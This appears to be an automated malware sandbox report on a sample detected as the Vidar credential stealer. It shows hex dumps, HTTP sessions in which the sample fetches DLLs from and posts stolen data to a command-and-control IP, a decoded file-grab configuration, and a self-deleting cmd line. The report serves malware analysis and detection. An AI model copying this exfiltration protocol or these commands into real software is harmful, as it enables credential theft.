                                                                          2024-05-22 16:28:19 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                          Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          15 | 192.168.2.6 | 49719 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-05-22 16:28:21 UTC | 174 | OUT | GET /softokn3.dll HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:21 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:21 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 257872
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          Connection: close
                                                                          ETag: "6315a9f4-3ef50"
                                                                          Accept-Ranges: bytes


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          16 | 192.168.2.6 | 49720 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-05-22 16:28:22 UTC | 178 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:23 UTC | 245 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:22 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 80880
                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                          Connection: close
                                                                          ETag: "6315a9f4-13bf0"
                                                                          Accept-Ranges: bytes


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          17 | 192.168.2.6 | 49721 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-05-22 16:28:24 UTC | 279 | OUT | POST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 1025
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:24 UTC | 1025 | OUT | Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------CFIEBKEHCAKFCBFIDAAKCont
                                                                          2024-05-22 16:28:24 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:24 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          18 | 192.168.2.6 | 49722 | 78.47.123.174 | 443 | 5768 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-05-22 16:28:25 UTC | 278 | OUT | POST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAK
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:25 UTC | 331 | OUT | Data Ascii: ------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------BGDBKKFHIEGDHJKECAAKCont
                                                                          2024-05-22 16:28:26 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close


                                                                          Session ID:19
                                                                          Source IP:192.168.2.6
                                                                          Source Port:49723
                                                                          Destination IP:78.47.123.174
                                                                          Destination Port:443
                                                                          PID:5768
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:26 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HCFIJKKKKKFCAAAAFBKFCont
                                                                          2024-05-22 16:28:27 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:27 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                          Session ID:20
                                                                          Source IP:192.168.2.6
                                                                          Source Port:49724
                                                                          Destination IP:78.47.123.174
                                                                          Destination Port:443
                                                                          PID:5768
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:28 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 453
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:28 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------DAFIEHIEGDHIDGDGHDHJCont
                                                                          2024-05-22 16:28:29 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:28 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session ID:21
                                                                          Source IP:192.168.2.6
                                                                          Source Port:49725
                                                                          Destination IP:78.47.123.174
                                                                          Destination Port:443
                                                                          PID:5768
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:30 UTC281OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBF
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 114541
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HDGDHCGCBKFHJKEBKFBFCont
                                                                          2024-05-22 16:28:31 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:31 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session ID:22
                                                                          Source IP:192.168.2.6
                                                                          Source Port:49726
                                                                          Destination IP:78.47.123.174
                                                                          Destination Port:443
                                                                          PID:5768
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:32 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAF
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------EBAEBFIIECBGCBGDHCAFCont
                                                                          2024-05-22 16:28:33 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:32 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID:23
                                                                          Source IP:192.168.2.6
                                                                          Source Port:49727
                                                                          Destination IP:78.47.123.174
                                                                          Destination Port:443
                                                                          PID:5768
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:33 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----JDGIIDHJEBGIDHJJDBKE
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------JDGIIDHJEBGIDHJJDBKECont
                                                                          2024-05-22 16:28:34 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:34 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Target ID:0
                                                                          Start time:12:27:53
                                                                          Start date:22/05/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x130000
                                                                          File size:364'032 bytes
                                                                          MD5 hash:F4FB6B518E2E550467F533124E1F80F4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:12:27:53
                                                                          Start date:22/05/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0x880000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: HiddenCobra_BANKSHOT_Gen, Description: Detects Hidden Cobra BANKSHOT trojan, Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:12:28:35
                                                                          Start date:22/05/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:12:28:35
                                                                          Start date:22/05/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:12:28:35
                                                                          Start date:22/05/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 10
                                                                          Imagebase:0xf30000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true


                                                                            Execution Graph

                                                                            Execution Coverage:3.5%
                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                            Signature Coverage:1.5%
                                                                            Total number of Nodes:1615
                                                                            Total number of Limit Nodes:14
LeaveCriticalSection 14996->15097 14998 139550 14998->14967 15000 139738 14999->15000 15004 13975f 14999->15004 15001 13fa79 _Fputc 41 API calls 15000->15001 15000->15004 15002 139754 15001->15002 15023 14057c 15002->15023 15004->14995 15005 13fa79 15004->15005 15006 13fa85 15005->15006 15007 13fa9a 15005->15007 15008 13b318 __strnicoll 14 API calls 15006->15008 15007->14993 15009 13fa8a 15008->15009 15010 139102 __strnicoll 41 API calls 15009->15010 15011 13fa95 15010->15011 15011->14993 15013 13fd62 15012->15013 15014 13fd6f 15012->15014 15015 13b318 __strnicoll 14 API calls 15013->15015 15016 13fdb8 15014->15016 15018 13fd96 15014->15018 15020 13fd67 15015->15020 15017 13b318 __strnicoll 14 API calls 15016->15017 15019 13fdbd 15017->15019 15064 13fcaf 15018->15064 15022 139102 __strnicoll 41 API calls 15019->15022 15020->14995 15022->15020 15024 140588 ___scrt_is_nonwritable_in_current_image 15023->15024 15025 14064c 15024->15025 15027 1405dd 15024->15027 15033 140590 15024->15033 15026 139085 _Fputc 29 API calls 15025->15026 15026->15033 15034 14578d EnterCriticalSection 15027->15034 15029 1405e3 15030 140600 15029->15030 15035 140684 15029->15035 15061 140644 15030->15061 15033->15004 15034->15029 15036 1406a9 15035->15036 15060 1406cc __fread_nolock 15035->15060 15037 1406ad 15036->15037 15039 14070b 15036->15039 15038 139085 _Fputc 29 API calls 15037->15038 15038->15060 15040 140722 15039->15040 15042 141e62 ___scrt_uninitialize_crt 43 API calls 15039->15042 15041 140208 ___scrt_uninitialize_crt 42 API calls 15040->15041 15043 14072c 15041->15043 15042->15040 15044 140772 15043->15044 15045 140732 15043->15045 15048 1407d5 WriteFile 15044->15048 15049 140786 15044->15049 15046 14075c 15045->15046 15047 140739 15045->15047 15050 13fdce ___scrt_uninitialize_crt 47 API calls 15046->15050 15055 1401a0 ___scrt_uninitialize_crt 6 API calls 15047->15055 15047->15060 15051 1407f7 GetLastError 15048->15051 15048->15060 15052 1407c3 15049->15052 15053 14078e 
15049->15053 15050->15060 15051->15060 15056 140286 ___scrt_uninitialize_crt 7 API calls 15052->15056 15054 1407b1 15053->15054 15057 140793 15053->15057 15058 14044a ___scrt_uninitialize_crt 8 API calls 15054->15058 15055->15060 15056->15060 15059 140361 ___scrt_uninitialize_crt 7 API calls 15057->15059 15057->15060 15058->15060 15059->15060 15060->15030 15062 1457b0 ___scrt_uninitialize_crt LeaveCriticalSection 15061->15062 15063 14064a 15062->15063 15063->15033 15065 13fcbb ___scrt_is_nonwritable_in_current_image 15064->15065 15077 14578d EnterCriticalSection 15065->15077 15067 13fcca 15076 13fd0f 15067->15076 15078 145864 15067->15078 15069 13b318 __strnicoll 14 API calls 15071 13fd16 15069->15071 15070 13fcf6 FlushFileBuffers 15070->15071 15072 13fd02 GetLastError 15070->15072 15094 13fd45 15071->15094 15091 13b305 15072->15091 15076->15069 15077->15067 15079 145871 15078->15079 15081 145886 15078->15081 15080 13b305 __dosmaperr 14 API calls 15079->15080 15083 145876 15080->15083 15082 13b305 __dosmaperr 14 API calls 15081->15082 15086 1458ab 15081->15086 15084 1458b6 15082->15084 15085 13b318 __strnicoll 14 API calls 15083->15085 15087 13b318 __strnicoll 14 API calls 15084->15087 15088 14587e 15085->15088 15086->15070 15089 1458be 15087->15089 15088->15070 15090 139102 __strnicoll 41 API calls 15089->15090 15090->15088 15092 13ede1 __strnicoll 14 API calls 15091->15092 15093 13b30a 15092->15093 15093->15076 15095 1457b0 ___scrt_uninitialize_crt LeaveCriticalSection 15094->15095 15096 13fd2e 15095->15096 15096->15020 15097->14998 15098->14981 16680 13c8a8 16683 13c574 16680->16683 16684 13c580 ___scrt_is_nonwritable_in_current_image 16683->16684 16691 13a8b5 EnterCriticalSection 16684->16691 16686 13c5b8 16692 13c5d6 16686->16692 16687 13c58a 16687->16686 16689 1468fb __Getctype 14 API calls 16687->16689 16689->16687 16691->16687 16695 13a8fd LeaveCriticalSection 16692->16695 16694 13c5c4 16695->16694 16703 1392d3 16704 1397ed ___scrt_uninitialize_crt 70 API 
